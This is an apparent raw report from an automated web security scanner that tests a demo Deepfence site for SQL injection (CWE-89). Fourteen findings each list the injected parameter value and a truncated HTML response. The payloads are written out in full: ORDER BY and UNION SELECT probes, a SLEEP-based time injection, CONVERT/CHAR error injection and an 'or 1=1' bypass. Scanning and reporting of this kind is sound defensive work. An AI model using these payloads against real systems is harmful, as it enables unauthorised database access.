Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #720\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #721\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #722\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #723\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1-true\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #724\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) \nAND 'vRxe'='vRxe\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #725\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)+CHAR(113)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #726\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #727\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' or 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #728\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #729\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #730\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io``\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #731\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #732\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #733\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\n\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> 